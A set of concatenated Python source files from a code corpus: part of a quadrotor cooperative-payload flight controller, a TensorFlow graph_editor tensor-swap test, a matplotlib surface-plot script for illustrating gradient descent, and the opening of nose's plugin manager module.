# 'yaw_des' float NA desired payload yaw, set to 0.0 currently
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# 'mu_des' ndarray 3 by 1 desired cable tension of the cable suspended under MAV 0
# 'attach_accel' ndarray 3 by 1 acceleration of the cable attach point
# 'rot_des' ndarray 3 by 3 desired rotation as a rotation matrix
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# params - a read_params class object containing all MAV parameters
# OUTPUTS:
# M - a 3 by 1 vector describing Moment
Rot = qd["rot"]
Rot_des = qd["rot_des"]
omega_des = qd["omega_des"]
e_Rot = np.matmul(Rot_des.T, Rot) - np.matmul(Rot.T, Rot_des)
e_angle = vee(e_Rot)/2
e_omega = qd["omega"] - np.matmul(Rot.T, np.matmul(Rot_des, omega_des))
M = np.cross(qd["omega"], np.matmul(params.I, qd["omega"]), axisa=0, axisb=0).T - np.matmul(params.Kpe, e_angle) - np.matmul(params.Kde, e_omega)
return M
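# Note: the attitude error used above is the standard SO(3) formulation
# e_R = 0.5 * vee(R_des^T R - R^T R_des). A standalone sketch (3x3 numpy
# rotation matrices, reusing the vee() helper imported in this module):
# def so3_attitude_error(R, R_des):
#     return vee(R_des.T @ R - R.T @ R_des) / 2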
def cooperative_suspended_payload_controller(self, ql, qd, pl_params, qd_params):
# DESCRIPTION:
# Controller for cooperative cable suspended payload and MAV(s)
# INPUTS:
# ql - a dictionary containing state of the payload, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 payload position
# 'vel' ndarray 3 by 1 payload velocity
# 'quat' ndarray 4 by 1 payload orientation as unit quaternion
# 'omega' ndarray 3 by 1 payload angular velocity
# 'rot' ndarray 3 by 3 payload rotation as rotation matrix
# 'pos_des' ndarray 3 by 1 desired payload position
# 'vel_des' ndarray 3 by 1 desired payload velocity
# 'acc_des' ndarray 3 by 1 desired payload acceleration
# 'jrk_des' ndarray 3 by 1 desired payload jerk
# 'quat_des' ndarray 4 by 1 desired payload orientation as unit quaternion
# set to [[1.], [0.], [0.], [0.]] currently
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# 'yaw_des' float NA desired payload yaw, set to 0.0 currently
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# qd - a list of dictionary containing states of all MAV(s)
# qd[0] would give a dictionary of MAV 0's states and related information, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 MAV 0's position
# 'vel' ndarray 3 by 1 MAV 0's velocity
# 'quat' ndarray 4 by 1 MAV 0's orientation as unit quaternion
# 'omega' ndarray 3 by 1 MAV 0's angular velocity
# 'rot' ndarray 3 by 3 MAV 0's rotation as rotation matrix
# 'xi' ndarray 3 by 1 MAV 0's cable direction as a unit vector
# 'xixiT' ndarray 3 by 3 xi dot product with xi
# 'xidot' ndarray 3 by 1 MAV 0's velocity normalized over separation distance
# 'yaw_des' float NA desired payload yaw, set to 0.0 currently
# 'yawdot_des' float NA time derivative of desired payload yaw, set to 0.0 currently
# 'mu_des' ndarray 3 by 1 desired cable tension of the cable suspended under MAV 0
# 'attach_accel' ndarray 3 by 1 acceleration of the cable attach point
# 'rot_des' ndarray 3 by 3 desired rotation as a rotation matrix
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# pl_params - a read_params class object containing payload parameters
# qd_params - a read_params class object containing all MAV parameters
# OUTPUTS:
# mu - a 3*(Number of MAV(s)) by 1 ndarray, describing tension condition of each cable
# att_acc_c - a 2*(Number of MAV(s)) by 1 ndarray, describing cable payload attachment acceleration
# qd_F - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 1 by 1 ndarray denoting the thrust
# qd_M - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 3 by 1 ndarray denoting the moment
# qd_quat_des - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 1d ndarray with 4 elements denoting the desired orientation as unit quaternion
# qd_rot_des - a dictionary with (Number of MAV(s)) fields, with key '0', '1', '2', etc.
# Each dictionary contains a 3 by 3 ndarray denoting the desired orientation as rotation matrix
if not pl_params.sim_start:
self.icnt = 0
self.icnt = self.icnt + 1
# Parameter Initialization
quat_des = ql["quat_des"]
omega_des = ql["omega_des"]
g = pl_params.grav
m = pl_params.mass
nquad = pl_params.nquad
e3 = np.array([[0],[0],[1.0]])
Rot = ql["rot"]
omega_asym = vec2asym(ql["omega"])
Rot_des = utilslib.QuatToRot(quat_des)
## Position control
# Position error
ep = ql["pos_des"]-ql["pos"]
# Velocity error
ed = ql["vel_des"]-ql["vel"]
# Desired acceleration. This equation drives the trajectory errors to zero.
acceleration_des = ql["acc_des"] + np.matmul(pl_params.Kp, ep) + np.matmul(pl_params.Kd, ed)
F = m*g*e3 + m*acceleration_des
## Attitude Control
# Errors of angles and angular velocities
e_Rot = Rot_des.T @ Rot - Rot.T @ Rot_des
e_angle = np.divide(vee(e_Rot), 2)
e_omega = ql["omega"] - Rot.T @ Rot_des @ omega_des.T
# Net moment
# Missing the angular acceleration term but in general it is negligible.
M = np.matmul(-pl_params.Kpe, e_angle) - np.matmul(pl_params.Kde, e_omega) # may need to be changed to scalar product
# Cable tension distribution
diag_rot = np.zeros((0,0), dtype=float)
for i in range(1, nquad+1):
diag_rot = LA.block_diag(diag_rot, Rot)
mu = diag_rot @ pl_params.pseudo_inv_P @ np.append(Rot.T @ F, M, axis=0)
for i in range(1, nquad+1):
if (0>mu[3*i-1, 0]):
mu[3*i-1, 0] = 0
print("mu is less than zero")
else:# Is this really necessary?
mu[3*i-1, 0] = mu[3*i-1, 0]
att_acc_c = acceleration_des + g*e3 + np.matmul(np.matmul(np.matmul(Rot, omega_asym), omega_asym), pl_params.rho_vec_list)
# Quadrotor Attitude Controller
qd_F = {}
qd_M = {}
qd_rot_des = {}
qd_quat_des = {}
for qn in range(0, nquad):
qd[qn]["yaw_des"] = 0
qd[qn]["yawdot_des"] = 0
qd[qn]["mu_des"] = mu[3*qn:3*(qn+1)]
qd[qn]["attach_accel"] = att_acc_c[:,qn].reshape((3,1))
[F_qn, M_qn, Rot_des_qn] = self.cooperative_attitude_controller(qd, qn, qd_params)
qd_F[qn] = F_qn
qd_M[qn] = M_qn
qd_quat_des[qn] = tranrot.from_matrix(Rot_des_qn).as_quat()
qd_rot_des[qn] = Rot_des_qn
#return qd_F, qd_M
return mu, att_acc_c, qd_F, qd_M, qd_quat_des, qd_rot_des
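# Illustrative use of the cooperative controller above (the state and
# parameter objects are assumptions; dictionary keys follow the docstring):
# ctrl = controller()
# mu, att_acc_c, qd_F, qd_M, qd_quat_des, qd_rot_des = \
#     ctrl.cooperative_suspended_payload_controller(ql, qd, pl_params, qd_params)
# F_0, M_0 = qd_F[0], qd_M[0]  # thrust and moment command for MAV 0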
# untested
def cooperative_payload_controller(self, ql, params):
if not params["sim_start"]:
# self.coeff0 = params.coeff0
self.icnt = 0
self.icnt = self.icnt + 1
## Parameter Initialization
quat_des = ql["quat_des"]
omega_des = ql["omega_des"]
g = params.grav
m = params.mass
e3 = np.array([[0],[0],[1]])
Rot = ql["rot"]
omega_asym = vec2asym(ql["omega"])
Rot_des = utilslib.QuatToRot(quat_des)
## Position control
# jerk_des = ql.jerk_des;
# Position error
ep = ql["pos_des"]-ql["pos"]
# Velocity error
ed = ql["vel_des"]-ql["vel"]
# Desired acceleration. This equation drives the trajectory errors to zero.
acceleration_des = ql["acc_des"] + np.matmul(params.Kp, ep) + np.matmul(params.Kd, ed)
# Net force F=kx*ex kv*ex_dot + mge3 +mxdes_ddot
F = m*g*e3 + m*acceleration_des
## Attitude Control
# Errors of angles and angular velocities
e_Rot = np.matmul(np.transpose(Rot_des), Rot) - np.matmul(np.transpose(Rot), Rot_des)
e_angle = vee(e_Rot)/2
e_omega = ql["omega"] - np.matmul(np.matmul(np.transpose(Rot), Rot_des), np.transpose(omega_des))
# Net moment
# Missing the angular acceleration term but in general it is negligible.
M = - np.matmul(params.Kpe, e_angle) - np.matmul(params.Kde, e_omega)
## Cable tension distribution
diag_rot = np.zeros((0,0), dtype=float)
for i in range(1, params.nquad+1):
diag_rot = scipy.linalg.block_diag(diag_rot,Rot)
mu = np.matmul(np.matmul(diag_rot, params.pseudo_inv_P), np.vstack((np.matmul(np.transpose(Rot), F), M)))
for i in range(1, params.nquad+1):
if mu[3*i-1]<0:
mu[3*i-1] = 0
att_acc_c = acceleration_des + g*e3 + Rot @ omega_asym @ omega_asym @ params.rho_vec_list
return mu,att_acc_c
# untested
def geometric_controller(self, qd, t, qn, params):
if self.gd.size == 0:
self.gd = np.zeros((0,3), dtype= float)
self.icnt = 0
self.icnt += 1
## Parameter Initialization
yaw_des = qd[qn]["yaw_des"]
yawdot_des = qd[qn]["yawdot_des"]
g = params.grav
m = params.mass
phi = qd[qn]["euler"][0]
theta = qd[qn]["euler"][1]
psi = qd[qn]["euler"][2]
e3 = np.array([[0], [0], [1]])
# The rotation matrix in this function is world to body [bRw] you will
# need to transpose this matrix to get the body to world [wRb] such that
# [wP] = [wRb] * [bP], where [bP] is a point in the body frame and [wP]
# is a point in the world frame
Rot_worldtobody = RPYtoRot_ZXY(phi, theta, psi)
## Position control
jerk_des = qd[qn]["jerk_des"]
# Position error
ep = qd[qn]["pos_des"]-qd[qn]["pos"]
# Velocity error
ed = qd[qn]["vel_des"]-qd[qn]["vel"]
# Desired acceleration. This equation drives the trajectory errors to zero.
acceleration_des = qd[qn]["acc_des"] + params.Kp @ ep + params.Kd @ ed
# Thrust f=(kx*ex kv*ex_dot + mge3 +mxdes_ddot)*Re3
Force = m*g*e3 + m*acceleration_des
F = np.transpose(Force) @ np.transpose(Rot_worldtobody) @ e3
## Attitude Control
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:,2] = Z_body_in_world
X_unit = np.vstack((np.cos(yaw_des), np.sin(yaw_des), 0))
Y_body_in_world = np.cross(Z_body_in_world,X_unit)
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1] = Y_body_in_world
X_body_in_world = np.cross(Y_body_in_world,Z_body_in_world)
Rot_des[:,0] = X_body_in_world
# Errors of angles and angular velocities
e_Rot = np.transpose(Rot_des) @ np.transpose(Rot_worldtobody) - Rot_worldtobody @ Rot_des
e_angle = vee(e_Rot)/2
p_des = -(m/F) * np.transpose(jerk_des - (np.transpose(Z_body_in_world) @ jerk_des) @ Z_body_in_world) @ Y_body_in_world
q_des = (m/F) * np.transpose(jerk_des - (np.transpose(Z_body_in_world) @ jerk_des) @ Z_body_in_world) @ X_body_in_world
r_des = yawdot_des * Z_body_in_world[2]
e_omega = qd[qn]["omega"] - Rot_worldtobody @ Rot_des @ np.transpose(np.hstack(p_des, q_des, r_des))
# Moment
# Missing the angular acceleration term but in general it is negligible.
M = - params.Kpe @ e_angle - params.Kde @ e_omega + np.cross(qd[qn]["omega"], params.I*qd[qn]["omega"])
# =================== Your code ends here ===================
# Output trpy and drpy as in hardware
trpy = np.array([0,0,0,0])
drpy = np.array([0,0,0,0])
return F, M, trpy, drpy
# untested
def hover_controller(self, qd, t, qn, params):
if self.gd.size == 0:
self.gd = np.zeros((0,3), dtype= float)
self.icnt = 0
self.icnt += 1
# position_now = qd{qn}.pos;
# velocity_now = qd{qn}.vel;
# Eulerangle_now = qd{qn}.euler;
# omega_now = qd{qn}.omega;
# position_tra = qd{qn}.pos_des;
# velocity_tra = qd{qn}.vel_des;
# acceleration_tra = qd{qn}.acc_des;
## Parameter Initialization
yaw_des = qd[qn]["yaw_des"]
yawdot_des = qd[qn]["yawdot_des"]
g = params.grav
m = params.mass
# Gain matrices
Kp_pos = np.array([[5, 0, 0],
[0, 5, 0],
[0, 0, 150]])
Kp_att = np.array([[5, 0, 0],
[0, 5, 0],
[0, 0, 150]])
Kd_att = np.array([[5.5, 0, 0],
[0, 5.5, 0],
[0, 0, 150]])
Ki_att = np.array([[0.004, 0, 0],
[0, 0.004, 0],
[0, 0, 0.004]])
Kpe = np.array([[0.1, 0, 0],
[0, 0.1, 0],
[0, 0, 0.2]])
Kde = np.array([[0.004, 0, 0],
[0, 0.004, 0],
[0, 0, 0.004]])
## Position control
# Position error
e_pos = qd[qn]["pos_des"]-qd[qn]["pos"]
vel_des = Kp_pos @ e_pos
# Velocity error
e_vel = vel_des-qd[qn]["vel"]
## Hover controller
# Desired acceleration. This equation drives the trajectory errors to zero.
acceleration_des = qd[qn]["acc_des"] + params.Kp @ e_pos + params.Kd @ e_vel
# Desired roll, pitch and yaw
phi_des = (acceleration_des[0]*np.sin(yaw_des)-acceleration_des[1]*np.cos(yaw_des))/g
theta_des = (acceleration_des[0]*np.cos(yaw_des)+acceleration_des[1]*np.sin(yaw_des))/g
psi_des = yaw_des
# Errors of angles and angular velocities
e_angle = np.transpose(np.hstack((phi_des, theta_des, psi_des))) - qd[qn]["euler"]
e_omega = np.transpose(np.hstack((0, 0, yawdot_des))) - qd[qn]["omega"]
# Thrust
F = m*g + m*acceleration_des[2]
# Moment
M = Kpe @ e_angle + Kde @ e_omega
#
self.gd[self.icnt-1,:] = np.hstack((t, phi_des, qd[qn]["euler"][0])) # for graphing
# Output trpy and drpy as in hardware
trpy = np.array([0,0,0,0])
drpy = np.array([0,0,0,0])
return F, M, trpy, drpy
def rigid_links_cooperative_payload_controller(self, ql, params):
# DESCRIPTION:
# Controller for rigid link connected payload and MAV(s)
# INPUTS:
# ql - a dictionary containing state of the payload, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 payload position
# 'vel' ndarray 3 by 1 payload velocity
# 'quat' ndarray 4 by 1 payload orientation as unit quaternion
# 'omega' ndarray 3 by 1 payload angular velocity
# 'rot' ndarray 3 by 3 payload rotation as rotation matrix
# 'pos_des' ndarray 3 by 1 desired payload position
# 'vel_des' ndarray 3 by 1 desired payload velocity
# 'acc_des' ndarray 3 by 1 desired payload acceleration
# 'jrk_des' ndarray 3 by 1 desired payload jerk
# 'quat_des' ndarray 4 by 1 desired payload orientation as unit quaternion
# set to [[1.], [0.], [0.], [0.]] currently
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# 'qd_yaw_des' float NA desired MAV yaw, set to 0.0 currently
# 'qd_yawdot_des' float NA time derivative of desired MAV yaw, set to 0.0 currently
# params - a read_params class object containing payload parameters
# OUTPUTS:
# uav_F - a dictionary with one field (key = '0'), a 3 by 1 ndarray denoting the desired force
# uav_F {0: array([[Fx],
# [Fy],
# [Fz]])}
# uav_M - a dictionary with one field (key = '0'), a 3 by 1 ndarray denoting the desired moment
# uav_F {0: array([[Mx],
# [My],
# [Mz]])}
if not params.sim_start:
self.icnt = 0
self.icnt = self.icnt + 1
## Parameter Initialization
quat_des = ql["quat_des"]
yaw_des = 0
omega_des = ql["omega_des"]
g = params.grav
m = params.struct_mass
e3 = np.array([[0],[0],[1]])
Rot = ql["rot"]
omega = ql["omega"]
## Position control
# Position error
ep = ql["pos_des"]-ql["pos"]
# Velocity error
ed = ql["vel_des"]-ql["vel"]
ep = ep.reshape((3,1))
ed = ed.reshape((3,1))
# Desired acceleration. This equation drives the trajectory errors to zero.
acceleration_des = ql["acc_des"] + params.Kp @ ep + params.Kd @ ed
Force = m*g*e3 + m*acceleration_des
tau = np.transpose(Force) @ Rot @ e3
## Attitude Control
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:,2:3] = Z_body_in_world
X_unit = np.array([[np.cos(yaw_des)], [np.sin(yaw_des)], [0]])
Y_body_in_world = np.cross(Z_body_in_world,X_unit, axisa=0, axisb=0).T
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1:2] = Y_body_in_world
X_body_in_world = np.cross(Y_body_in_world,Z_body_in_world, axisa=0, axisb=0).T
Rot_des[:,0:1] = X_body_in_world
# Errors of angles and angular velocities
e_Rot = np.transpose(Rot_des) @ Rot - np.transpose(Rot) @ Rot_des
e_angle = vee(e_Rot)/2
e_omega = omega.reshape((3,1)) - np.transpose(Rot) @ Rot_des @ omega_des.reshape((3, 1))
# Net moment
# Missing the angular acceleration term but in general it is negligible.
M = - params.Kpe @ e_angle - params.Kde @ e_omega + np.cross(omega, params.struct_I @ omega, axisa=0, axisb=0).reshape((3,1))
## Quadrotor Thrust and Moment Distribution
u = params.thrust_moment_distribution_mat @ np.vstack((tau, M))
u = params.A @ u
uav_F_arr = u[0] * Rot[:,2].reshape((3,1))
uav_M_arr = u[1:4]
# convert u into uav_F and uav_M
uav_F = {}
uav_F[0] = uav_F_arr
uav_M = {}
uav_M[0] = uav_M_arr
return uav_F, uav_M
def single_payload_geometric_controller(self, ql, qd_params, pl_params):
# DESCRIPTION:
# Controller for rigid link connected payload and MAV(s)
# INPUTS:
# ql - a dictionary containing state of the payload and MAV combined, specifically
# Key Type Size Description
# 'pos' ndarray 3 by 1 payload position
# 'vel' ndarray 3 by 1 payload velocity
# 'qd_pos' ndarray 3 by 1 MAV position
# 'qd_vel' ndarray 3 by 1 MAV velocity
# 'qd_quat' ndarray 4 by 1 MAV orientation as unit quaternion
# 'qd_omega' ndarray 3 by 1 MAV angular velocity
# 'qd_rot' ndarray 3 by 3 MAV orientation as rotation matrix
# 'pos_des' ndarray 3 by 1 desired payload position
# 'vel_des' ndarray 3 by 1 desired payload velocity
# 'acc_des' ndarray 3 by 1 desired payload acceleration
# 'jrk_des' ndarray 3 by 1 desired payload jerk
# 'quat_des' ndarray 4 by 1 desired payload orientation as unit quaternion
# set to [[1.], [0.], [0.], [0.]] currently
# 'omega_des' ndarray 3 by 1 desired payload angular velocity
# set to [[0., 0., 0.]] currently
# 'qd_yaw_des' float NA desired MAV yaw, set to 0.0 currently
# 'qd_yawdot_des' float NA time derivative of desired MAV yaw, set to 0.0 currently
# pl_params - a read_params class object containing payload parameters
# qd_params - a read_params class object containing all MAV parameters
# OUTPUTS:
# F - a 1 by 1 ndarray, denoting the thrust force
# M - a list of size 3, containing three 1d ndarray of size 1, denoting the moment
# M = [[array([Mx])]
# [array([My])]
# [array([Mz])]]
## Parameter Initialization
if not pl_params.sim_start:
self.icnt = 0
g = pl_params.grav
e3 = np.array([[0],[0],[1]])
self.icnt = self.icnt + 1
quad_m = qd_params.mass
pl_m = pl_params.mass
l = pl_params.cable_length
## State Initialization
quad_load_rel_pos = ql["qd_pos"]-ql["pos"]
quad_load_rel_vel = ql["qd_vel"]-ql["vel"]
quad_load_distance = np.linalg.norm(quad_load_rel_pos)
xi_ = -quad_load_rel_pos/quad_load_distance
xixiT_ = xi_ @ np.transpose(xi_)
xidot_ = -quad_load_rel_vel/quad_load_distance
xi_asym_ = vec2asym(xi_)
w_ = np.cross(xi_, xidot_, axisa=0, axisb=0).T
Rot_worldtobody = ql["qd_rot"]
## Payload Position control
#Position error
ep = ql["pos_des"]-ql["pos"]
#Velocity error
ed = ql["vel_des"]-ql["vel"]
# Desired acceleration. This equation drives the trajectory errors to zero.
acceleration_des = ql["acc_des"] + g*e3 + pl_params.Kp @ ep + pl_params.Kd @ ed
# Desired yaw and yawdot
yaw_des = ql["qd_yaw_des"] # This can remain for Quad
yawdot_des = ql["qd_yawdot_des"]
## Cable Direction Control
# Desired cable direction
mu_des_ = (quad_m + pl_m) * acceleration_des + quad_m * l * (np.transpose(xidot_) @ xidot_) * xi_
xi_des_ = -mu_des_ / np.linalg.norm(mu_des_)
xi_des_dot_ = np.zeros((3, 1), dtype=float)
w_des_ = np.cross(xi_des_, xi_des_dot_, axisa=0, axisb=0).T
w_des_dot_ = np.zeros((3, 1), dtype=float)
mu_ = xixiT_ @ mu_des_
e_xi = np.cross(xi_des_, xi_, axisa=0, axisb=0).T
e_w = w_ + xi_asym_ @ xi_asym_ @ w_des_
Force = mu_ - quad_m*l*np.cross(xi_, qd_params.Kxi @ e_xi + qd_params.Kw @ e_w+ (xi_.T @ w_des_) * xidot_ + xi_asym_ @ xi_asym_ @ w_des_dot_, axisa=0, axisb=0).T
F = np.transpose(Force) @ Rot_worldtobody @ e3
# Attitude Control
Rot_des = np.zeros((3,3), dtype=float)
Z_body_in_world = Force/np.linalg.norm(Force)
Rot_des[:,2:3] = Z_body_in_world
X_unit = np.array([[np.cos(yaw_des)], [np.sin(yaw_des)], [0]])
Y_body_in_world = np.cross(Z_body_in_world, X_unit, axisa=0, axisb=0).T
Y_body_in_world = Y_body_in_world/np.linalg.norm(Y_body_in_world)
Rot_des[:,1:2] = Y_body_in_world
X_body_in_world = np.cross(Y_body_in_world,Z_body_in_world, axisa=0, axisb=0).T
Rot_des[:,0:1] = X_body_in_world
# Errors of angles and angular velocities
e_Rot = np.transpose(Rot_des) @ Rot_worldtobody - Rot_worldtobody.T @ Rot_des
e_angle = vee(e_Rot)/2
p_des = 0.0
q_des = 0.0
r_des = yawdot_des*Z_body_in_world[2]
e_omega = ql["qd_omega"] - Rot_worldtobody.T @ Rot_des @ np.array([[p_des], [q_des], [r_des]])
# Moment
# Missing the angular acceleration term but in general it is negligible.
M = - qd_params.Kpe @ e_angle - qd_params.Kde @ e_omega + np.cross(ql["qd_omega"],qd_params.I @ ql["qd_omega"], axisa=0, axisb=0).T
return F, M
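# Illustrative use of the single-payload controller above (state keys as
# documented; the parameter objects are assumptions):
# F, M = controller().single_payload_geometric_controller(ql, qd_params, pl_params)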
|
the-stack_0_6469 | # pylint: disable=g-bad-file-header
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.contrib.graph_editor."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.contrib import graph_editor as ge
class SubgraphviewTest(tf.test.TestCase):
def test_simple_swap(self):
g = tf.Graph()
with g.as_default():
a0 = tf.constant(1.0, shape=[2], name="a0")
b0 = tf.constant(2.0, shape=[2], name="b0")
c0 = tf.add(a0, b0, name="c0")
a1 = tf.constant(3.0, shape=[2], name="a1")
b1 = tf.constant(4.0, shape=[2], name="b1")
c1 = tf.add(a1, b1, name="b1")
ge.util.swap_ts([a0, b0], [a1, b1])
assert c0.op.inputs[0] == a1 and c0.op.inputs[1] == b1
assert c1.op.inputs[0] == a0 and c1.op.inputs[1] == b0
if __name__ == "__main__":
tf.test.main()
|
the-stack_0_6473 | """
Script used to create surface plots to illustrate
(stochastic) gradient descent in chapter 5.
"""
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
# Initialize figure
fig = plt.figure()
ax = fig.gca(projection='3d')
# Make data.
X = np.arange(-2, 2, 0.3)
Y = np.arange(-2, 2, 0.3)
X, Y = np.meshgrid(X, Y)
R = Y * np.sin(X) - X * np.cos(Y)
Z = np.sin(R)
# Plot the surface.
surf = ax.plot_surface(X, Y, Z, cmap=cm.coolwarm,
linewidth=0, antialiased=False)
# Customize the z axis.
ax.set_zlim(-1.0, 1.0)
ax.zaxis.set_major_locator(LinearLocator(8))
ax.zaxis.set_major_formatter(FormatStrFormatter('%.01f'))
# Add a color bar which maps values to colors.
fig.colorbar(surf, shrink=0.5, aspect=5)
# Show plot
plt.show()
|
the-stack_0_6474 | """
Plugin Manager
--------------
A plugin manager class is used to load plugins, manage the list of
loaded plugins, and proxy calls to those plugins.
The plugin managers provided with nose are:
:class:`PluginManager`
This manager doesn't implement loadPlugins, so it can only work
with a static list of plugins.
:class:`BuiltinPluginManager`
This manager loads plugins referenced in ``nose.plugins.builtin``.
:class:`EntryPointPluginManager`
This manager uses setuptools entrypoints to load plugins.
:class:`ExtraPluginsPluginManager`
This manager loads extra plugins specified with the keyword
`addplugins`.
:class:`DefaultPluginMananger`
This is the manager class that will be used by default. If
setuptools is installed, it is a subclass of
:class:`EntryPointPluginManager` and :class:`BuiltinPluginManager`;
otherwise, an alias to :class:`BuiltinPluginManager`.
:class:`RestrictedPluginManager`
This manager is for use in test runs where some plugin calls are
not available, such as runs started with ``python setup.py test``,
where the test runner is the default unittest :class:`TextTestRunner`. It
is a subclass of :class:`DefaultPluginManager`.
Writing a plugin manager
========================
If you want to load plugins via some other means, you can write a
plugin manager and pass an instance of your plugin manager class when
instantiating the :class:`nose.config.Config` instance that you pass to
:class:`TestProgram` (or :func:`main` or :func:`run`).
To implement your plugin loading scheme, implement ``loadPlugins()``,
and in that method, call ``addPlugin()`` with an instance of each plugin
you wish to make available. Make sure to call
``super(self).loadPlugins()`` as well if have subclassed a manager
other than ``PluginManager``.
"""
import inspect
import logging
import os
import sys
from itertools import chain as iterchain
from warnings import warn
import nose.config
from nose.failure import Failure
from nose.plugins.base import IPluginInterface
from nose.pyversion import sort_list
import pickle
from io import StringIO
__all__ = ['DefaultPluginManager', 'PluginManager', 'EntryPointPluginManager',
'BuiltinPluginManager', 'RestrictedPluginManager']
log = logging.getLogger(__name__)
class PluginProxy(object):
"""Proxy for plugin calls. Essentially a closure bound to the
given call and plugin list.
The plugin proxy also must be bound to a particular plugin
interface specification, so that it knows what calls are available
and any special handling that is required for each call.
"""
interface = IPluginInterface
def __init__(self, call, plugins):
try:
self.method = getattr(self.interface, call)
except AttributeError:
raise AttributeError("%s is not a valid %s method"
% (call, self.interface.__name__))
self.call = self.makeCall(call)
self.plugins = []
for p in plugins:
self.addPlugin(p, call)
def __call__(self, *arg, **kw):
return self.call(*arg, **kw)
def addPlugin(self, plugin, call):
"""Add plugin to my list of plugins to call, if it has the attribute
I'm bound to.
"""
meth = getattr(plugin, call, None)
if meth is not None:
if call == 'loadTestsFromModule' and \
len(inspect.getargspec(meth)[0]) == 2:
orig_meth = meth
meth = lambda module, path, **kwargs: orig_meth(module)
self.plugins.append((plugin, meth))
def makeCall(self, call):
if call == 'loadTestsFromNames':
# special case -- load tests from names behaves somewhat differently
# from other chainable calls, because plugins return a tuple, only
# part of which can be chained to the next plugin.
return self._loadTestsFromNames
meth = self.method
if getattr(meth, 'generative', False):
# call all plugins and yield a flattened iterator of their results
return lambda *arg, **kw: list(self.generate(*arg, **kw))
elif getattr(meth, 'chainable', False):
return self.chain
else:
# return a value from the first plugin that returns non-None
return self.simple
def chain(self, *arg, **kw):
"""Call plugins in a chain, where the result of each plugin call is
sent to the next plugin as input. The final output result is returned.
"""
result = None
# extract the static arguments (if any) from arg so they can
# be passed to each plugin call in the chain
static = [a for (static, a)
in zip(getattr(self.method, 'static_args', []), arg)
if static]
for p, meth in self.plugins:
result = meth(*arg, **kw)
arg = static[:]
arg.append(result)
return result
def generate(self, *arg, **kw):
"""Call all plugins, yielding each item in each non-None result.
"""
for p, meth in self.plugins:
result = None
try:
result = meth(*arg, **kw)
if result is not None:
for r in result:
yield r
except (KeyboardInterrupt, SystemExit):
raise
except:
exc = sys.exc_info()
yield Failure(*exc)
continue
def simple(self, *arg, **kw):
"""Call all plugins, returning the first non-None result.
"""
for p, meth in self.plugins:
result = meth(*arg, **kw)
if result is not None:
return result
def _loadTestsFromNames(self, names, module=None):
"""Chainable but not quite normal. Plugins return a tuple of
(tests, names) after processing the names. The tests are added
to a suite that is accumulated throughout the full call, while
names are input for the next plugin in the chain.
"""
suite = []
for p, meth in self.plugins:
result = meth(names, module=module)
if result is not None:
suite_part, names = result
if suite_part:
suite.extend(suite_part)
return suite, names
class NoPlugins(object):
"""Null Plugin manager that has no plugins."""
interface = IPluginInterface
def __init__(self):
self._plugins = self.plugins = ()
def __iter__(self):
return ()
def _doNothing(self, *args, **kwds):
pass
def _emptyIterator(self, *args, **kwds):
return ()
def __getattr__(self, call):
method = getattr(self.interface, call)
if getattr(method, "generative", False):
return self._emptyIterator
else:
return self._doNothing
def addPlugin(self, plug):
raise NotImplementedError()
def addPlugins(self, plugins):
raise NotImplementedError()
def configure(self, options, config):
pass
def loadPlugins(self):
pass
def sort(self):
pass
class PluginManager(object):
"""Base class for plugin managers. PluginManager is intended to be
used only with a static list of plugins. The loadPlugins() implementation
only reloads plugins from _extraplugins to prevent those from being
overridden by a subclass.
The basic functionality of a plugin manager is to proxy all unknown
attributes through a ``PluginProxy`` to a list of plugins.
Note that the list of plugins *may not* be changed after the first plugin
call.
"""
proxyClass = PluginProxy
def __init__(self, plugins=(), proxyClass=None):
self._plugins = []
self._extraplugins = ()
self._proxies = {}
if plugins:
self.addPlugins(plugins)
if proxyClass is not None:
self.proxyClass = proxyClass
def __getattr__(self, call):
try:
return self._proxies[call]
except KeyError:
proxy = self.proxyClass(call, self._plugins)
self._proxies[call] = proxy
return proxy
def __iter__(self):
return iter(self.plugins)
def addPlugin(self, plug):
# allow, for instance, plugins loaded via entry points to
# supplant builtin plugins.
new_name = getattr(plug, 'name', object())
self._plugins[:] = [p for p in self._plugins
if getattr(p, 'name', None) != new_name]
self._plugins.append(plug)
def addPlugins(self, plugins=(), extraplugins=()):
"""extraplugins are maintained in a separate list and
re-added by loadPlugins() to prevent their being overwritten
by plugins added by a subclass of PluginManager
"""
self._extraplugins = extraplugins
for plug in iterchain(plugins, extraplugins):
self.addPlugin(plug)
def configure(self, options, config):
"""Configure the set of plugins with the given options
and config instance. After configuration, disabled plugins
are removed from the plugins list.
"""
log.debug("Configuring plugins")
self.config = config
cfg = PluginProxy('configure', self._plugins)
cfg(options, config)
